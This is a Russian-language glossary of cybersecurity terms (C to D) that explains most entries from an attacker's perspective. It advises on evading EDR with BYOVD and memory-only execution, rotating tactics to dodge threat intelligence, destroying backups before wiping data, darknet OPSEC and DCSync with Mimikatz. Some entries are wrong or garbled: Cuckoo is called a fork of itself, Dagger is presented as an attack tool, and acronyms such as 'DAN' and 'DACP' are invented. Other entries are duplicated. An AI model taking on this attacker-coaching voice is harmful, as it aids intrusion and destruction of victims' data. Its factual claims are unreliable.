Cross-Tenant Attack Атака между tenant'ами в облачных средах (Azure AD, Salesforce). Если tenant A скомпрометирован, и он имеет интеграции с tenant B (через OAuth, доверительные отношения), атакующий может перейти в tenant B. ShinyHunters атаковал Salesforce через Experience Cloud (один tenant) и получал доступ к данным tenant-ов клиентов (других tenant'ов). Cross-tenant attack форма supply chain атаки.

CrowdStrike Вендор EDR (Falcon), один из лидеров рынка. CrowdStrike использует поведенческий анализ, AI, cloud-native архитектуру. Для атакующего CrowdStrike серьезный противник: требует тщательной настройки evasion (direct syscalls, memory-only, LOLBins, отключение через BYOVD). CrowdStrike также публикует отчеты об APT-группах, что дает ценную информацию.

CRT (Certificate) Сертификат (X.509), используемый для TLS, подписи кода, аутентификации. Кража CRT (приватного ключа) позволяет: расшифровывать TLS-трафик, подписывать малварь, выдавать себя за сервис. CRT хранятся в хранилищах Windows (Cert:\CurrentUser\My), файлах (.pfx, .p12), HSM. Infostealer крадет CRT из браузеров и хранилищ.

Crypto (Cryptocurrency) Криптовалюта (Bitcoin, Ethereum, Monero). В атаках используется для: выкупов (ransomware), оплаты услуг (IAB, CaaS), отмывания средств. Monero предпочтителен из-за приватности; Bitcoin используется, когда жертва не может купить Monero. Crypto exchange цель взломов (Bybit $1.5B) и фишинга (fake airdrops, seed phrase theft).

Crypto Exchange Биржа криптовалют (Binance, Coinbase, Kraken, Bybit). Биржи цели взломов (Bybit $1.5B, FTX не взлом, но кража). На биржах хранятся миллиарды долларов в hot wallets. Взлом биржи может быть осуществлен через: компрометацию приватных ключей (холодные кошельки), supply chain (Bybit через Safe{Wallet}), фишинг сотрудников.

Crypto Jacking Скрытый майнинг криптовалюты на устройстве жертвы. Реализуется через: браузерный майнинг (Coinhive устарел, но есть аналоги), майнинг-малварь (XMRig), cloud cryptojacking (использование украденных AWS-ключей). Crypto jacking менее заметен, чем ransomware, но создает нагрузку на системы и увеличивает счета за электричество/облако.

Crypto Locker Рансомвер (первая крупная волна 2013-2014). CryptoLocker шифровал файлы и требовал выкуп в Bitcoin. В 2026 CryptoLocker исторический термин, но используется как общее название для ransomware. Современные аналоги: Qilin, Zollo, BlackCat.

Crypto Mining Майнинг криптовалют (добыча новых монет). В атаках используется как способ монетизации (crypto jacking) или как легитимная деятельность (майнинг-фермы). Майнинг требует больших вычислительных мощностей (GPU, ASIC), поэтому атакующие используют ботнеты или облачные ресурсы для майнинга.

Crypto Mixer Миксер (Tornado Cash, Sinbad, Wasabi Wallet), смешивающий криптовалюту от разных пользователей, чтобы запутать след. Используется для отмывания выкупов. После миксера криптовалюта становится сложно отслеживаемой. Миксеры могут быть централизованными (Sinbad) или децентрализованными (Tornado Cash). Tornado Cash был под санкциями OFAC, но все еще используется.

Crypto Phishing Фишинг, нацеленный на кражу криптовалюты: поддельные сайты обменников (fake exchange), fake airdrops (раздача бесплатных токенов), фейковые кошельки (ввод seed phrase), подмена адресов кошельков (clipboard hijacking). Crypto phishing часто использует социальную инженерию в Twitter, Discord, Telegram.

Cryptographic Key Криптографический ключ: симметричный (AES) для шифрования данных, асимметричный (RSA, EC) для подписи и обмена ключами. Кража cryptographic key конечная цель многих атак: ключ дает доступ к зашифрованным данным, возможность подписи (malware), расшифровку трафика. Ключи хранятся в: TPM, HSM, файлах, памяти, реестре.

Cryptography Криптография: наука о шифровании и дешифровании. В атаках криптография используется для: шифрования данных жертвы (ransomware), сокрытия C2-трафика (TLS), шифрования малвари (обфускация), защиты коммуникаций (PGP). Понимание криптографии необходимо для: взлома слабых алгоритмов (MD5, SHA1), обхода шифрования (кража ключей), дешифровки данных.

CSAM (Child Sexual Abuse Material) Материалы сексуального насилия над детьми. The Com (Sextortion Com) распространяет CSAM, принуждает несовершеннолетних к созданию CSAM, угрожает публикацией. Производство и распространение CSAM уголовное преступление во всех юрисдикциях с максимальными сроками. Law enforcement (FBI, Europol) активно преследует эти сети.

CSEC (Communications Security Establishment Canada) Канадское агентство кибербезопасности и радиоэлектронной разведки (аналог NSA). CSEC выпускает предупреждения об уязвимостях (например, о CVE-2026-20963), координирует реагирование в Канаде.

CSIRT (Computer Security Incident Response Team) Группа реагирования на инциденты в организации. CSIRT занимается: обнаружением, анализом, сдерживанием, ликвидацией последствий атак. Для атакующего CSIRT противник, который будет пытаться выкинуть его из сети. Скорость реагирования CSIRT критический фактор: если они медленные, атакующий может завершить операцию.

CSO (Chief Security Officer) Директор по безопасности. CSO цель whaling (атака на высокопоставленных лиц). Компрометация CSO может дать доступ к: планам защиты, информации об уязвимостях, бюджетам на безопасность, а также может использоваться для BEC (подделка приказов о переводах).

CSP (Cloud Service Provider) Провайдер облачных услуг: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud. CSP предоставляют инфраструктуру (IaaS), платформы (PaaS), программное обеспечение (SaaS) по модели подписки. Для атакующего CSP цель и среда: компрометация учетных записей CSP (через утечку ключей, фишинг) дает доступ к облачным ресурсам (S3, EC2, базы данных). CSP также являются целями supply chain атак (Bybit через AWS). Удары по AWS дата-центрам (1 марта 2026, IRGC) пример атаки на CSP как на критическую инфраструктуру.

CSRF (Cross-Site Request Forgery) Уязвимость веб-приложений, позволяющая злоумышленнику заставить браузер жертвы отправить HTTP-запрос от ее имени на целевой сайт, используя cookies жертвы. Пример: жертва залогинена в банке, атакующий отправляет ей ссылку на поддельном сайте, которая делает POST-запрос на перевод денег. CSRF используется для: изменения пароля, перевода средств, смены email, удаления данных. Защита: CSRF-токены, SameSite cookies, проверка Referer/Origin. В 2026 CSRF встречается в старых приложениях и API, где нет токенов.

CSS (Cascading Style Sheets) Каскадные таблицы стилей. В контексте атак CSS используется для: CSS injection (эксфильтрация данных через селекторы, атрибуты), fingerprinting (определение установленных шрифтов, размера окна), обхода CSP (Content Security Policy). CSS injection может быть использован в XSS-атаках для кражи данных.

CST (Cyber Security Team) Команда кибербезопасности организации. CST противник атакующего. CST состоит из: SOC (мониторинг), IR (реагирование), threat hunters (поиск скрытых угроз), engineers (настройка защиты). Знание структуры CST помогает атакующему понять, кто может обнаружить его активность.

CTF (Capture The Flag) Соревнования по кибербезопасности, где участники решают задачи (reverse engineering, pwn, web, crypto, forensics). CTF способ тренировки навыков. AI-агенты (GPT-5, Claude) уже решают 9 из 10 CTF-челленджей. Для атакующего CTF способ отточить техники в легальной среде.

CTI (Cyber Threat Intelligence) Разведка угроз: сбор и анализ информации о киберугрозах (TTPs групп, индикаторы компрометации, уязвимости). CTI используется защитниками для проактивной защиты. Для атакующего CTI означает, что его TTPs могут стать известными и детекты будут настроены. Поэтому атакующий должен постоянно менять TTPs, избегая повторения.

Cuckoo Sandbox с открытым кодом для анализа малвари (форк Cuckoo). Cuckoo запускает образцы в изолированной среде, отслеживает поведение. В 2026 Cuckoo считается устаревшим; используется Cape (Cuckoo Advanced Persistent Emulation). Однако принципы (анализ системных вызовов, запись сетевого трафика) остаются.

CVE (Common Vulnerabilities and Exposures) Словарь общеизвестных уязвимостей и экспозиций, управляемый MITRE. Каждая уязвимость получает уникальный идентификатор (CVE-YYYY-NNNNN). CVE используется для: однозначной идентификации уязвимостей, отслеживания патчей, обмена информацией между исследователями и вендорами. Для атакующего CVE источник информации о fresh 1-day: мониторинг новых CVE, чтение описаний (CVSS, векторы атаки), поиск PoC (proof of concept) на GitHub, Exploit-DB. CVE-2026-20131 (Cisco FMC) и CVE-2026-20963 (SharePoint) примеры CVE, активно эксплуатировавшихся.

CVE (Number) Идентификатор уязвимости в формате CVE-YYYY-NNNNN. Присваивается CNA (CVE Numbering Authority). CVE позволяет однозначно идентифицировать уязвимость, отслеживать патчи, обсуждать в сообществе. Для атакующего CVE источник информации о fresh 1-day: мониторим новые CVE, ищем детали эксплуатации.

CVE-2026-20131 Уязвимость в Cisco Secure Firewall Management Center (FMC): unauthenticated RCE через insecure deserialization Java byte stream. CVSS 10.0 (maximum). Interlock эксплуатировал эту уязвимость как zero-day с 26 января 2026, до выхода патча 4 марта 2026. 36 дней zero-day window позволили Interlock скомпрометировать десятки организаций. Добавлена в CISA KEV 18 марта 2026.

CVE-2026-20963 Уязвимость в Microsoft SharePoint Server: deserialization of untrusted data, leading to unauthenticated remote code execution. CVSS 8.8. Патч выпущен 13 января 2026, но активная эксплуатация подтверждена только 18 марта 2026 (CISA KEV). 66 дней между патчем и подтверждением exploitation gap, в который атакующие могли использовать 1-day против непропатченных систем. Attack chain: tax-season phishing AiTM credential theft compromised M365 account SharePoint RCE.

CVE-2026-25253 Уязвимость в OpenClaw (AI agent framework): remote code execution через malicious skills в ClawHub marketplace. CVSS 8.8. OpenClaw был скомпрометирован в течение 72 часов после массового принятия. Атака использовала: поддельные навыки (skills) в маркетплейсе, которые содержали малварь; exposed admin интерфейсы (312,000+ инстансов с портом 18789 открытым); credential harvesting через fake crypto tools.

CVSS (Common Vulnerability Scoring System) Система оценки критичности уязвимостей от 0 до 10. CVSS 10.0 максимальная (CVE-2026-20131). CVSS 8.8 высокая (CVE-2026-20963). CVSS учитывает: вектор атаки (network/local), сложность, нужны ли привилегии, взаимодействие пользователя. Для атакующего CVSS важен, чтобы понять, насколько уязвимость критична для defenders, и насколько быстро они будут патчить.

CWSS (Common Weakness Scoring System) Система оценки слабостей (weaknesses), а не уязвимостей (vulnerabilities). CWSS оценивает, насколько серьезна слабость (misconfig, слабый пароль, отсутствие MFA) в контексте организации. Используется для приоритизации исправлений.

Cyber Сокращение от "киберпространство", "кибербезопасность", "кибератака". Используется как префикс: cyber threat, cyber defense, cyber warfare. В контексте атак "cyber" отделяет операции в цифровом пространстве от физических (kinetic).

Cyber Command (USCYBERCOM) Киберкомандование США, объединяющее киберсилы всех видов вооруженных сил. USCYBERCOM проводит наступательные и оборонительные кибероперации. В марте 2026 USCYBERCOM был "первым движущим" в конфликте с Ираном, нанося некинетические эффекты до кинетических ударов (disrupting, degrading and blinding Iran's ability to see, communicate and respond).

Cyber Defense Киберзащита: меры по предотвращению, обнаружению и реагированию на кибератаки. Включает: EDR, SIEM, firewalls, threat hunting, IR. Для атакующего cyber defense система, которую нужно обойти.

Cyber Kill Chain Модель атаки, разработанная Lockheed Martin, описывающая этапы: reconnaissance, weaponization, delivery, exploitation, installation, command & control, actions on objectives. Cyber kill chain используется защитниками для построения детектов. Для атакующего понимание kill chain помогает: атаковать этапы, которые меньше всего защищены, или нарушать последовательность (например, переходить сразу к actions on objectives, если есть доступ).

Cyber Physical System (CPS) Кибер-физические системы, где цифровые компоненты управляют физическими: промышленные контроллеры (PLC), медицинские устройства, автомобили, энергосети. Атака на CPS может иметь физические последствия (взрыв, остановка сердца, авария). Stryker (медицинские устройства), JLR (автомобили), водоканалы (обработка воды) примеры CPS. Атака на CPS требует понимания как IT, так и OT (operational technology).

Cyber Resilience Устойчивость к кибератакам: способность системы продолжать работу или быстро восстанавливаться после атаки. Для атакующего высокая cyber resilience означает, что даже после успешной атаки жертва может быстро восстановиться, снижая давление для выплаты выкупа. Handala атаковала Stryker, полагаясь на низкую resilience (Intune как единая точка отказа). CISA shutdown снижает cyber resilience США.

Cyber Warfare Кибервойна: применение кибератак в военных конфликтах. Включает: атаки на критическую инфраструктуру, шпионаж, дезинформацию, кибер-кинетическую координацию. Март 2026 пример cyber warfare между Ираном и США/Израилем.

CyberAv3ngers Иранская прокси-группа (MOIS-linked). CyberAv3ngers атаковала водоканалы в США (2023-2024) и израильские цели. Использует: эксплуатацию OT-систем (SCADA), публичные заявления о взломах, doxxing. CyberAv3ngers координируется через Electronic Operations Room с Handala и другими прокси.

Cybercrime Киберпреступность: незаконная деятельность с использованием компьютеров и сетей. Включает: ransomware, data theft, carding, BEC, DDoS extortion, CaaS. Cybercrime индустрия с годовым доходом в триллионы долларов. The Com, ShinyHunters, Interlock участники cybercrime.

CyberGaeco Подразделение бразильской полиции по борьбе с киберпреступностью. CyberGaeco проводит Operation 404 (седьмая фаза в марте 2026), направленную против пиратских сайтов и стриминговых сервисов. CyberGaeco координируется с law enforcement США, Великобритании, Перу, Аргентины, Парагвая.

CyberSec Сокращение от cybersecurity.

Cybersecurity Кибербезопасность: практика защиты систем, сетей, данных от кибератак. Включает: информационную безопасность (infosec), сетевую безопасность, безопасность приложений, безопасность облака, безопасность IoT, безопасность AI.

Cybersecurity and Infrastructure Security Agency (CISA) Национальное киберагентство США, входит в структуру DHS (Department of Homeland Security). CISA отвечает за: защиту критической инфраструктуры (энергетика, водоснабжение, healthcare, финансы), координацию реагирования на инциденты, выпуск предупреждений об уязвимостях (KEV Known Exploited Vulnerabilities), управление программой наград (Rewards for Justice). В марте 2026 CISA работала с 38% штата из-за shutdown, потеряв 1000 сотрудников за год. CISA seized домены Handala в координации с DOJ и FBI. Для атакующего CISA главный противник в США, который может координировать охоту на него.

Cyberspace Киберпространство: виртуальное пространство, создаваемое компьютерными сетями. В киберпространстве происходят атаки, защита, шпионаж. Cyberspace не имеет физических границ, что делает его ареной для конфликтов между государствами.

Cylance Продукт для защиты конечных точек (EDR), основанный на AI-анализе. Cylance был одним из первых, кто использовал ML для обнаружения малвари. В 2026 Cylance считается legacy после покупки BlackBerry; многие организации перешли на CrowdStrike, SentinelOne, Microsoft Defender.

Cymru (Team Cymru) Организация, занимающаяся threat intelligence и анализом BGP/ASN. Team Cymru предоставляет данные о маршрутизации, которые используются для отслеживания C2-инфраструктуры. Для атакующего Team Cymru угроза: может помочь обнаружить его серверы через BGP мониторинг.

Cypress Фреймворк для тестирования веб-приложений. Cypress используется в CI/CD. Уязвимости в Cypress (например, тесты, запускаемые на production-данных) могут быть использованы для эксфильтрации.

Cytoscape Инструмент для визуализации графов. Используется для анализа BloodHound данных (графы атак в Active Directory). BloodHound использует Cytoscape для отображения attack paths. Для атакующего Cytoscape инструмент для планирования lateral movement на основе собранных данных.

D

DAC (Discretionary Access Control) Дискреционный контроль доступа, при котором владелец объекта (файла, папки) сам определяет, кто и какие права имеет. В Windows DAC реализован через ACL (Access Control Lists). Для атакующего DAC означает, что если он получает права владельца (или администратора), он может менять разрешения для любых объектов, открывая себе доступ к данным, которые должны быть защищены.

DACP (Dynamic Access Control) Динамический контроль доступа в Windows, позволяющий задавать политики доступа на основе атрибутов пользователя (отдел, должность, классификация данных). DACP использует централизованные политики, которые хранятся в Active Directory. Для атакующего DACP препятствие: если политики настроены правильно, даже имея права администратора, нельзя просто так открыть доступ к файлам с высокой классификацией нужно изменить атрибуты или обойти политику.

Daemon Фоновый процесс в Unix/Linux, работающий без привязки к терминалу (например, sshd, httpd). В контексте атак daemon может быть целью для persistence: создать daemon, который запускается при загрузке системы и обеспечивает постоянный доступ. Daemon часто имеют повышенные привилегии (root), что делает их привлекательной целью для внедрения.

DAG (Directed Acyclic Graph) Структура данных, используемая в некоторых блокчейнах (IOTA, Hedera) вместо традиционной цепочки блоков. DAG позволяет обрабатывать транзакции параллельно, что делает его потенциально более масштабируемым. Для атакующего DAG-блокчейны новая поверхность атаки: консенсус может быть уязвим к атакам типа "spending" или "lazy" валидаторов.

Dagger Инструмент для CI/CD-атак, позволяющий внедрять вредоносный код в конвейеры сборки через манипуляцию зависимостями, Docker-образами, или secrets. Dagger (и подобные инструменты) используются для supply chain атак: скомпрометировав один CI/CD пайплайн, можно внедрить backdoor в код, который попадет в production всех клиентов.

DAN (Domain Admin) Администратор домена Active Directory. Учетная запись Domain Admin имеет максимальные привилегии в домене: доступ ко всем компьютерам, серверам, возможность изменять групповые политики, дампить хэши всех пользователей. Для атакующего получение Domain Admin главная цель после компрометации AD. Golden Ticket, DCSync, дамп NTDS.dit техники для получения Domain Admin или эквивалентных прав.

Dangling DNS DNS-запись, указывающая на ресурс (IP-адрес, S3-бакет, Azure Storage), который больше не существует. Dangling DNS используется для subdomain takeover: атакующий создает ресурс по указанному адресу (например, создает S3-бакет с именем, на которое ведет DNS) и получает контроль над поддоменом. Это позволяет: хостить фишинговые сайты на легитимных доменах, красть cookies (SameSite политика), проводить XSS-атаки.

Dangling IP IP-адрес, который больше не используется (ресурс удален, но IP остался в конфигурациях). Dangling IP может быть использован для: захвата трафика, если кто-то получит этот IP (например, в облаке), или для BGP hijacking, если IP-блок не используется. В облачных средах dangling IP частая причина утечек.

DAP (Directory Access Protocol) Протокол доступа к каталогам, включая LDAP (Lightweight Directory Access Protocol). Атаки на DAP/LDAP включают: LDAP injection (внедрение запросов), анонимный доступ (если не настроена аутентификация), похищение сессий. Active Directory использует LDAP для запросов; компрометация LDAP-сервера дает доступ к информации о пользователях и группах.

Dark Web Часть интернета, доступная только через специальные сети (Tor, I2P, Freenet). Dark web используется для: даркнет-маркетов (Alphabay), общения (Dread), хостинга leak sites (ShinyHunters). Для атакующего dark web среда для безопасной коммуникации, покупки инструментов, продажи данных. OPSEC требует использования nested onion (Tor over VPN), burner идентичностей, PGP.

DarkComet RAT (Remote Administration Tool), популярный в 2010-х. DarkComet позволял удаленно управлять компьютером, красть данные, записывать видео с веб-камеры. В 2026 DarkComet считается legacy, его сигнатуры давно в базах антивирусов. Однако его исходный код доступен, и некоторые группы модифицируют его для своих целей.

DarkGate Malware loader и RAT, распространяемый через фишинговые письма с вложениями (ISO, LNK). DarkGate загружает дополнительные модули (инфостилер, ransomware) с C2. DarkGate имеет встроенные механизмы обхода AMSI, ETW, и может работать в memory-only режиме. Используется как initial access vector для более крупных атак.

DarkMarket Крупный даркнет-маркет, закрытый в 2021 году в результате международной операции. На DarkMarket торговали наркотиками, оружием, украденными данными, хакерскими услугами. В 2026 DarkMarket исторический пример, но его структура (эскроу, рейтинг продавцов, форум) скопирована современными маркетами (Alphabay, Russian Market).

Darknet Скрытые сети (Tor, I2P, Freenet), обеспечивающие анонимность за счет многослойного шифрования и маршрутизации. Darknet используется для: хостинга C2, коммуникации между членами групп, публикации утекших данных (leak sites). Для атакующего darknet среда, где его сложнее отследить, но где также работают law enforcement (FBI, Europol) с собственными методами деанонимизации.

DARPA (Defense Advanced Research Projects Agency) Исследовательское агентство Министерства обороны США, финансирующее передовые технологии. DARPA финансирует проекты в области кибербезопасности, включая AI-защиту (CHESS) и автоматическое обнаружение уязвимостей. Для атакующего DARPA означает, что защитники получают доступ к новейшим технологиям раньше, чем они станут коммерческими.

Data Breach Утечка данных: несанкционированное раскрытие конфиденциальной информации. Data breach может быть результатом: взлома (Conduent, Wynn), misconfig (китайский surveillance cluster), кражи инсайдерами, потери устройств. Для атакующего data breach конечная цель (extortion) или промежуточный этап (сбор данных для follow-on атак).

Data Destruction Уничтожение данных: безвозвратное удаление, шифрование с потерей ключа, физическое разрушение носителей. Handala использовала data destruction через Intune (factory reset) для уничтожения 200,000 устройств Stryker. В отличие от ransomware, data destruction не требует выкупа; цель disruption.

Data Diode Устройство, обеспечивающее одностороннюю передачу данных: данные могут идти только из сети A в сеть B, но не обратно. Используется для защиты OT-сетей (промышленных) от IT-сетей. Для атакующего data diode означает, что даже если он скомпрометирует IT-сеть, он не сможет напрямую отправить команды в OT-сеть; нужно искать другие каналы (например, физический доступ, уязвимости в самой data diode).

Data Exfiltration Вывоз данных (эксфильтрация) за пределы контролируемой среды. Для атакующего data exfiltration этап после сбора данных. Методы: low & slow (медленно, чтобы не триггерить детекты), шифрование (чтобы DLP не заметил), легитимные сервисы (MEGA, Dropbox, S3), DNS-туннели, nested onion. Handala exfiltrated 50TB из Stryker масштаб, требующий тщательного планирования.

Data Extortion Вымогательство через угрозу публикации украденных данных (без шифрования). ShinyHunters специализируется на data extortion: кража данных через Salesforce misconfig, затем ультиматум жертве: заплатите или данные будут опубликованы. Data extortion тише, чем ransomware (нет шифрования, меньше шума), и часто столь же эффективна, потому что репутационный ущерб от утечки может быть катастрофическим.

Data Lake Централизованное хранилище больших данных (raw data) для аналитики. Data Lake часто содержит: логи, данные сенсоров, транзакции, PII. Для атакующего Data Lake золотая жила: один доступ дает терабайты данных. Telus lost 1PB+ данных, вероятно, из Data Lake.

Data Leak Утечка данных. Data leak может быть: публичной (на BreachForums, Telegram), приватной (продажа закрытым синдикатам), или инсайдерской. ShinyHunters публикует data leaks на своем leak site, чтобы создать давление на жертву.

Data Masking Маскировка данных: замена чувствительных данных на вымышленные, но сохраняющие формат (например, "--****-1234" для кредитных карт). Data masking используется для защиты в тестовых средах, аналитике. Для атакующего data masking препятствие, если он получает доступ к замаскированным данным; нужно искать исходные данные в других местах.

Data Privacy Конфиденциальность данных: защита PII (персональных данных) от несанкционированного доступа. Data privacy регулируется законами: GDPR (Европа), CCPA (Калифорния), HIPAA (здравоохранение). Нарушение data privacy влечет многомиллионные штрафы. Атакующие используют угрозу нарушения data privacy как leverage в extortion: Interlock цитирует GDPR в ransom notes.

Data Retention Хранение данных: политики, определяющие, как долго хранятся данные. Длительное data retention увеличивает риск утечки (больше данных доступно). Для атакующего data retention означает, что даже если жертва удалила данные после выкупа, старые бэкапы могут содержать копии. Поэтому при атаке нужно уничтожать бэкапы, а не только текущие данные.

Data Sovereignty Суверенитет данных: данные подчиняются законам страны, где они физически хранятся. Data sovereignty используется для юрисдикционной арбитраж: храня данные в стране с недружественными отношениями с США, можно затруднить seizure. Handala использовала .to (Тонга) для доменов, потому что Тонга не выдает информацию США.

Data Stealer См. Infostealer. Инфостилер вредоносное ПО, предназначенное для кражи данных с зараженного устройства: пароли из браузеров, cookies (сессионные токены), файлы автозаполнения (адреса, кредитные карты), крипто-кошельки, файлы, скриншоты, данные из мессенджеров (Telegram, Discord, WhatsApp). Популярные инфостилеры 2026: RedLine, LummaC2, Stealc, Vidar. Распространяются через malvertising, crack-сайты, фишинг. Украденные данные продаются на даркнет-маркетах или агрегируются для credential stuffing.

Data Visualization Визуализация данных. В контексте атак используется для: анализа BloodHound графов (attack paths), визуализации сети (nmap, Zenmap), понимания структуры организации. Data visualization помогает планировать lateral movement.

Data Warehouse Хранилище данных: структурированное хранилище для аналитики (OLAP). Data Warehouse содержит исторические данные, часто PII, финансовую информацию. Для атакующего Data Warehouse цель после компрометации: дамп данных может быть использован для extortion или продажи.

Data Wiping Безвозвратное уничтожение данных с носителя, делающее восстановление информации невозможным (или крайне сложным и дорогим). В отличие от простого удаления файла (который лишь помечает пространство как свободное), data wiping перезаписывает сектора случайными данными (однократно или многократно), или использует команды SSD/NVMe (ATA Secure Erase, NVMe Format) для аппаратного сброса. В контексте атак data wiping деструктивная операция, цель которой не выкуп, а нанесение максимального ущерба, disruption, уничтожение улик. Handala использовала data wiping через Microsoft Intune: массовая команда factory reset уничтожила 200,000 устройств Stryker, включая операционные системы, приложения, данные сотрудников. В отличие от ransomware, где данные шифруются и могут быть восстановлены при наличии ключа, data wiping необратим. Wiper-атаки (NotPetya, WhisperGate, Handala) являются формой data wiping. Для атакующего data wiping инструмент для: завершения операции (уничтожение следов), нанесения максимального ущерба (если цель disruption, а не выкуп), или эскалации (если жертва отказалась платить). После data wiping восстановление возможно только из бэкапов, которые также должны быть уничтожены до этого.

Database База данных (SQL, NoSQL). Базы данных содержат: PII, пароли (в хэшированном виде), транзакции, конфигурации. Для атакующего базы данных главная цель после доступа к сети. Методы доступа: SQL injection (если приложение уязвимо), кража учетных данных (из файлов конфигурации, переменных окружения), прямой доступ (если база данных открыта в интернет). ShinyHunters использовал API Salesforce для эксфильтрации данных из баз.

Database Firewall Специализированный межсетевой экран для защиты баз данных, анализирующий SQL-запросы и блокирующий подозрительные (SQL injection, массовое извлечение). Для атакующего database firewall препятствие: нужно обходить его через легитимные запросы (например, через API приложения), или атаковать саму firewall.

Datacenter Дата-центр: физическое здание с серверами, сетевым оборудованием, системами охлаждения и электропитания. Дата-центры цели кинетических атак: IRGC нанес удары дронами по AWS дата-центрам в ОАЭ и Бахрейне (1 марта 2026). Дата-центры также цели кибератак: отключение питания, вентиляции, сетевого оборудования.

DaVinci Resolve Программное обеспечение для видеомонтажа, использовавшееся в supply chain атаках: злоумышленники взломали аккаунт разработчика и распространяли малварь через официальные обновления. DaVinci Resolve пример того, что даже легитимное ПО может быть вектором атаки, если скомпрометирован процесс сборки или распространения.

DaVita Медицинская компания (диализные центры), жертва Interlock. В результате атаки были скомпрометированы миллионы записей пациентов (PHI Protected Health Information). DaVita пример атаки на healthcare, где утечка данных имеет высокие ставки (жизни пациентов, регуляторные штрафы).

DB (Database) База данных (Database) структурированное хранилище данных. Типы: реляционные (SQL: MySQL, PostgreSQL, Microsoft SQL Server, Oracle), NoSQL (MongoDB, Cassandra, Redis), графовые (Neo4j), временные (InfluxDB). Базы данных содержат: PII (персональные данные), пароли (в хэшированном виде), транзакции, конфигурации. Для атакующего базы данных главная цель после доступа к сети. Методы доступа: SQL injection (если приложение уязвимо), кража учетных данных (из файлов конфигурации, переменных окружения), прямой доступ (если база данных открыта в интернет). ShinyHunters использовал API Salesforce для эксфильтрации данных из баз.

DBA (Database Administrator) Администратор баз данных. DBA имеет доступ ко всем базам данных, часто с максимальными привилегиями. Компрометация DBA дает атакующему полный доступ к данным. DBA цель для spear-phishing, vishing, или lateral movement после компрометации AD.

DBaaS (Database as a Service) База данных как услуга в облаке (Amazon RDS, Azure SQL Database, Google Cloud SQL). DBaaS управляется провайдером, но клиент отвечает за конфигурацию (пароли, доступ). Misconfig в DBaaS (публичный доступ, слабые пароли) частая причина утечек. Для атакующего DBaaS цель: доступ к ключам AWS/Azure дает доступ к управляемой базе данных.

DBMS (Database Management System) Система управления базами данных (MySQL, PostgreSQL, Microsoft SQL Server, Oracle). Уязвимости DBMS: SQL injection, deserialization, RCE. Атаки на DBMS могут дать доступ к данным, повышение привилегий, выполнение кода на сервере.

DC (Data Center) Дата-центр (Data Center) физическое здание с серверами, сетевым оборудованием, системами охлаждения и электропитания. Дата-центры цели кинетических атак: IRGC нанес удары дронами по AWS дата-центрам в ОАЭ и Бахрейне (1 марта 2026). Дата-центры также цели кибератак: отключение питания, вентиляции, сетевого оборудования, компрометация систем управления (BMS). Для атакующего дата-центр цель для disruption (wiper, ransomware).

DC (Domain Controller) Контроллер домена Active Directory. DC сервер, хранящий базу AD (NTDS.dit), аутентифицирующий пользователей, управляющий групповыми политиками. Компрометация DC дает атакующему полный контроль над доменом. DC главная цель после начального доступа. DCSync, дамп NTDS.dit, Golden Ticket техники атак на DC.

DCE (Distributed Computing Environment) Технология распределенных вычислений от Open Software Foundation, включающая RPC (Remote Procedure Call). Windows использует DCE/RPC для многих функций (MS-RPC). Уязвимости в DCE/RPC (MS08-067, EternalBlue) использовались для распространения червей. В 2026 DCE/RPC остается целью в legacy-системах.

DCOM (Distributed Component Object Model) Распределенная версия COM, позволяющая вызывать COM-объекты на удаленных компьютерах. DCOM используется в Windows для удаленного управления (WMI, PowerShell). Атаки: DCOM для lateral movement (создание процессов на удаленных компьютерах через DCOM), DCOM для persistence (регистрация вредоносного COM-объекта). DCOM требует аутентификации, но может быть использован с украденными учетными данными.

DCS (Distributed Control System) Распределенная система управления промышленными процессами (нефтепереработка, химическое производство, электростанции). DCS подмножество ICS (Industrial Control Systems). Атаки на DCS могут привести к физическим последствиям: взрывы, разливы, отключения. Stuxnet (2010) атаковал центрифуги через DCS. Handala атаковала Stryker (медицинское производство), но не через DCS, а через Intune.

DCSync Техника атаки на Active Directory, позволяющая имитировать контроллер домена и запрашивать хэши паролей всех пользователей (включая krbtgt) через API Directory Replication Service. Для DCSync нужны права Replicating Directory Changes (обычно есть у Domain Admins). DCSync не требует запуска малвари на DC; можно выполнить удаленно, имея учетные данные с нужными правами. Mimikatz (lsadump::dcsync) классическая реализация.

DDE (Dynamic Data Exchange) Старый механизм Windows для обмена данными между приложениями. DDE использовался в атаках через Microsoft Office: документы Word могли выполнять команды через DDE без макросов. DDE был отключен по умолчанию после 2017 года, но все еще может быть включен в старых версиях Office или через реестр. В 2026 DDE legacy, но может встретиться в целевых атаках на старые системы.

DDoS (Distributed Denial of Service) Распределенная атака на доступность, когда множество устройств (ботнет) одновременно отправляют запросы к цели, перегружая ее ресурсы (сеть, CPU, память). DDoS используется для: disruption (отвлечение внимания), extortion (вымогательство: заплатите, иначе атака продолжится), отвлечения защитников во время основной атаки. В 2026 DDoSaaS (DDoS as a Service) доступен за $50-$500 в месяц.

DDoS Amplification Усиление DDoS-атаки через открытые резолверы (DNS, NTP, Memcached, SSDP). Злоумышленник отправляет небольшой запрос с поддельным IP-адресом жертвы на открытый сервис; сервис отвечает большим ответом (усиление в десятки-сотни раз) на IP жертвы. DNS amplification использует запрос ANY, который возвращает большой ответ. NTP amplification (monlist) классика.

DDoS Protection Защита от DDoS: Cloudflare, Akamai, AWS Shield, Azure DDoS Protection. DDoS Protection фильтрует трафик, пропуская легитимный и блокируя аномальный. Для атакующего DDoS Protection означает, что простая атака на объем не сработает; нужно: атаковать уязвимости в самой защите (например, исчерпать CPU на appliance), использовать сложные многослойные атаки (application layer, slowloris), или атаковать другие векторы (API, база данных) в обход защиты.

DDoSaaS (DDoS as a Service) DDoS-атаки как услуга. Покупатель платит за атаку на цель (IP, домен) на определенное время. Провайдер DDoSaaS использует ботнет (Mirai, собранный из IoT) для генерации трафика. Цены: от $50 за 1 час атаки до $500 за 24 часа. DDoSaaS используется для отвлечения, вымогательства, мести.

Dead Drop Анонимная точка обмена информацией, не связанная с личностью: зашифрованное сообщение на pastebin, файл на file sharing сервисе, комментарий в блоге. Dead drops используются для: передачи C2-адресов, обмена ключами, оставления инструкций для других участников группы.

Dead Man's Switch Механизм, автоматически активирующийся при отсутствии периодического сигнала ("сердцебиения") от оператора. В контексте атак используется для: публикации данных, если жертва не заплатила выкуп; уничтожения инфраструктуры, если оператор арестован; отправки предупреждений. ShinyHunters могла бы использовать dead man's switch для автоматической публикации данных Berkadia, если бы выкуп не был заплачен.

